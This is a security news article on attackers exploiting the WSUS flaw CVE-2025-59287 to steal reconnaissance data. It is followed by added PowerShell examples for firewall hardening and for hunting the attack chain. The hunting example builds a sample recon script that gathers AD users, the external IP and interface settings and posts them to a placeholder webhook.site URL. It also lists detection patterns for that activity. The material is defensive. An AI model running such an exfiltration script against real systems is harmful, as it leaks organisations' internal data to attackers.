Hackers Exploiting Windows Server Update Services Vulnerability to Steal Sensitive Data from Organizations


A Windows Server Update Services (WSUS) vulnerability is being actively exploited in the wild. Criminals are using it to steal sensitive data from organizations across several industries.

The vulnerability, tracked as CVE-2025-59287, was first addressed in Microsoft's October 14, 2025 Patch Tuesday release; because that fix was incomplete, Microsoft shipped an out-of-band update on October 23, 2025. Attackers began abusing the flaw shortly after proof-of-concept code became publicly available on GitHub.

Sophos telemetry indicates that exploitation began on October 24, 2025, just hours after technical analysis and exploit code were released online.

The threat actors targeted internet-facing WSUS servers in universities, technology companies, manufacturing firms, and healthcare organizations, primarily based in the United States.

While Sophos has confirmed six incidents so far, security experts believe the actual number of compromised organizations is significantly higher.

How the Attacks Unfold

The exploit abuses a critical deserialization bug in WSUS that allows unauthenticated remote code execution. Against a vulnerable server, the attackers spawn nested cmd.exe processes from the IIS worker process and use them to launch Base64-encoded PowerShell commands, so the payload runs with the privileges of that worker process.


The malicious script executes silently on compromised systems, gathering valuable intelligence about targeted organizations.

The harvested data includes the external IP address and port of the vulnerable host, an enumerated list of Active Directory domain users, and detailed network interface configurations. This information is then exfiltrated to webhook.site URLs controlled by the attackers.


Sophos researchers discovered four unique webhook.site URLs associated with the attacks, with three linked to the platform’s free service tier.

By analyzing the request logs on two of the publicly accessible URLs, researchers observed that exploitation began at 02:53 UTC on October 24 and that both endpoints hit the free tier's limit of 100 logged requests by 11:32 UTC the same day. Because the logs stop at that cap, the true number of exploitation attempts is unknown and almost certainly higher.

The rapid exploitation of this vulnerability demonstrates how quickly threat actors move to weaponize newly disclosed flaws.

The indiscriminate nature of the attacks suggests cybercriminals are scanning for exposed WSUS servers on the internet and exploiting them opportunistically rather than targeting specific organizations.

According to Rafe Pilling, Director of Threat Intelligence at Sophos, “This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.”

The stolen data could be used for reconnaissance, follow-up attacks, or sold to other malicious actors on underground marketplaces. Organizations running WSUS services should immediately apply Microsoft’s security patches and conduct thorough reviews of their network configurations.

Additionally, companies should identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports 8530 (HTTP) and 8531 (HTTPS) to only those systems that genuinely require connectivity.
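The following script is an added example for the recommendation above; it is not code from the article or from Sophos. It audits the on-host Windows Firewall for inbound rules that open TCP 8530/8531 to any remote address, disables them, and replaces them with an allow rule scoped to trusted ranges. The client subnets are assumptions and must be replaced with your own; run it in an elevated PowerShell session on the WSUS server.

```powershell
# Added example (not from the article): restrict WSUS listeners to trusted client ranges.
$wsusPorts      = '8530', '8531'                   # WSUS HTTP and HTTPS listeners
$allowedClients = '10.0.0.0/8', '192.168.0.0/16'   # assumption: your internal client/management ranges

# 1. Is WSUS listening, and on which addresses? 0.0.0.0 / :: means every interface,
#    including any interface that faces the internet.
Get-NetTCPConnection -State Listen -LocalPort $wsusPorts -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess |
    Format-Table -AutoSize

# 2. Find enabled inbound allow rules that expose these ports to 'Any' remote address
#    (the weak state this recommendation is about).
$broadRules = Get-NetFirewallPortFilter -Protocol TCP |
    Where-Object { ($_.LocalPort -contains '8530') -or ($_.LocalPort -contains '8531') -or ($_.LocalPort -contains 'Any') } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' -and $_.Enabled -eq 'True' } |
    Where-Object { ($_ | Get-NetFirewallAddressFilter).RemoteAddress -contains 'Any' }

foreach ($rule in $broadRules) {
    Write-Warning "Disabling '$($rule.DisplayName)': it allows TCP $($wsusPorts -join '/') from any address"
    Disable-NetFirewallRule -Name $rule.Name
}

# 3. Replace them with an allow rule scoped to the trusted ranges. With the profile default
#    inbound action set to Block, traffic that matches no allow rule is dropped, so no
#    explicit block rule is needed (and block rules would override the allow anyway).
Set-NetFirewallProfile -Profile Domain,Private,Public -DefaultInboundAction Block
New-NetFirewallRule -DisplayName 'WSUS clients (restricted)' -Direction Inbound -Protocol TCP `
    -LocalPort $wsusPorts -RemoteAddress $allowedClients -Action Allow
```

Two caveats: Windows Firewall evaluates block rules before allow rules, so do not add a "block from Any" rule on the same ports, or your own clients will be cut off too. And a host firewall is defence in depth, not the fix: a WSUS server reachable from the internet should be moved behind the perimeter, and the server must still receive Microsoft's update for CVE-2025-59287.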

Security teams should review logs for signs of exploitation and implement network segmentation to prevent lateral movement if compromises are discovered.
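The script below is an added hunting example, not code from the article or from Sophos. It covers the log review recommended here together with the attack chain described under "How the Attacks Unfold" (nested cmd.exe under the IIS worker, Base64-encoded PowerShell, recon data posted to webhook.site). It decodes any -EncodedCommand argument and flags the parent/child relationships the article describes. The sample events are constructed to mimic that chain; the webhook.site token and the recon script are placeholders, not real indicators.

```powershell
# Added example (not from the Sophos report). Input objects have the Image, ParentImage and
# CommandLine fields of Sysmon Event ID 1 or Security 4688 (with command-line auditing on).

# Strings the attackers' recon script would plausibly contain: the exfil host and the
# commands needed to collect an external IP, AD users and interface configuration.
$reconPatterns = @('webhook\.site', 'Get-ADUser', 'net\s+user\s+/domain',
                   'ipconfig', 'Get-NetIPConfiguration', 'ifconfig\.me', 'ipinfo\.io')

function Get-DecodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts -e, -ec, -enc or -EncodedCommand followed by Base64 of UTF-16LE text.
    if ($CommandLine -match '(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Find-WsusExploitChain {
    param([object[]]$Events)
    $hits = @()
    foreach ($e in $Events) {
        $img     = [IO.Path]::GetFileName($e.Image).ToLower()
        $parent  = [IO.Path]::GetFileName($e.ParentImage).ToLower()
        $reasons = @()

        # The IIS worker process (or the WSUS service) has no business spawning a shell.
        if (($parent -in 'w3wp.exe', 'wsusservice.exe') -and ($img -in 'cmd.exe', 'powershell.exe')) {
            $reasons += "shell spawned by $parent"
        }
        # cmd.exe launching cmd.exe is a weak signal on its own; it matters next to the others.
        if ($parent -eq 'cmd.exe' -and $img -eq 'cmd.exe') { $reasons += 'nested cmd.exe' }

        if ($img -in 'powershell.exe', 'pwsh.exe') {
            $decoded = Get-DecodedCommand $e.CommandLine
            if ($decoded) {
                $reasons += 'encoded PowerShell command'
                foreach ($p in $reconPatterns) {
                    if ($decoded -match $p) { $reasons += "decoded script matches '$p'" }
                }
            }
        }
        if ($reasons.Count -gt 0) {
            $hits += [pscustomobject]@{ Image = $img; Parent = $parent; Reasons = ($reasons -join '; ') }
        }
    }
    return $hits
}

# --- constructed sample events (not real telemetry); the webhook token is a placeholder ---
$reconScript = @'
$ip    = Invoke-RestMethod https://ifconfig.me/ip
$users = Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName
$nics  = Get-NetIPConfiguration | Out-String
Invoke-RestMethod -Method Post -Uri https://webhook.site/00000000-0000-0000-0000-000000000000 -Body (@{ ip = $ip; users = $users; nics = $nics } | ConvertTo-Json)
'@
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($reconScript))
$ps      = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

$sample = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c cmd.exe /c powershell.exe -nop -w hidden -enc ' + $encoded }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe';          Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c powershell.exe -nop -w hidden -enc ' + $encoded }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe';          Image = $ps;                           CommandLine = 'powershell.exe -nop -w hidden -enc ' + $encoded }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe';              Image = $ps;                           CommandLine = 'powershell.exe -File C:\scripts\backup.ps1' }   # benign
)

Find-WsusExploitChain -Events $sample | Format-Table -AutoSize
```

On a real server, feed the function with events from Sysmon (`Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}`) or from the Security log (Event ID 4688, which only carries the command line if process-creation auditing with command-line logging is enabled), mapping the Image, ParentImage and CommandLine fields onto the objects shown. Any hit on the first or third rule on a WSUS host during the exploitation window warrants treating the server as compromised, not merely as unpatched.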
